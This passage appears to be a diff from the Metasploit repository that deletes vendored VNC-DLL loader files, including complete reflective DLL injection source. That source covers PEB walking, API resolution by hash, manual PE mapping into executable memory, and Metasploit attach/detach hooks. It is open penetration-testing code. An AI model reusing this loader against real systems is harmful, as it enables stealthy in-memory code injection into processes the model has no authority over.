// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
#define _VNCDLL_LOADER_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
//===============================================================================================//
#endif
//===============================================================================================//

53
external/source/vncdll/loader/ReflectiveDLLInjection.h vendored
View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

451
external/source/vncdll/loader/ReflectiveLoader.c vendored
View File

@ -1,451 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

197
external/source/vncdll/loader/ReflectiveLoader.h vendored
View File

@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

6
external/source/vncdll/loader/loader.rc vendored
View File

@ -1,6 +0,0 @@
#ifdef _X64_
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
#endif

437
external/source/vncdll/loader/loader.vcproj vendored
View File

@ -1,437 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="loader"
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
RootNamespace="loader"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
